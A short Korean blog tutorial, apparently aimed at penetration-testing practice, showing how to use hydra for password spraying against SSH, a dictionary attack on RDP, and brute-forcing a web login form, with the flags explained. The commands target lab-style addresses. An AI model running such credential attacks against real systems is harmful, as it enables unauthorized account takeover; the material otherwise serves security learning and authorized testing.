외로운 Nova의 작업실
hydra - 간단 사용법 본문
hydra는 여러명의 유저를 상대로 여러 패스워드를 사용해서 인증을 시도해 암호를 찾아내는 툴입니다. 간단한 사용법을 알아보겠습니다.
- 여러명 유저, 하나의 패스워드
hydra -L username.txt -p 'p@ssw0rd' 10.10.10.10 sshusername.txt는 만들어주시면됩니다. 10.10.10.10의 ssh 서버에 계속 로그인해서 맞는 패스워드가 맞는 유저를 찾아냅니다.
- RDP 딕셔너리 공격
hydra -t 1 -V -f -l user -P password.txt rdp://10.10.10.10-t : 쓰레드수
-V : 자세한 설명
-f : 비밀번호 찾는 즉시 멈춤
-l : 이름
-P : 딕셔너리 파일
- 하나의 아이디, 여러개의 패스워드, http-form 로그인
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.17 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"-l : 사용자이름
-P : 패스워드 파일
http-post-form :"경로:username=^USER^&password=^PASS^:로그인 실패시 문장"
'Server Penetesting > Hacking Tool' 카테고리의 다른 글
| sqlmap - 기본 사용법 (0) | 2023.05.05 |
|---|---|
| wpscan 사용법 (0) | 2023.04.21 |
| gobuster 기본 명령어 (0) | 2023.04.10 |
| mimikatz - 1(설치 및 LSASS 메모리 덤프, hash-the-pass) (0) | 2023.04.04 |
| Network Connection(nc) (0) | 2023.03.29 |
'Server Penetesting/Hacking Tool' Related Articles
more
Comments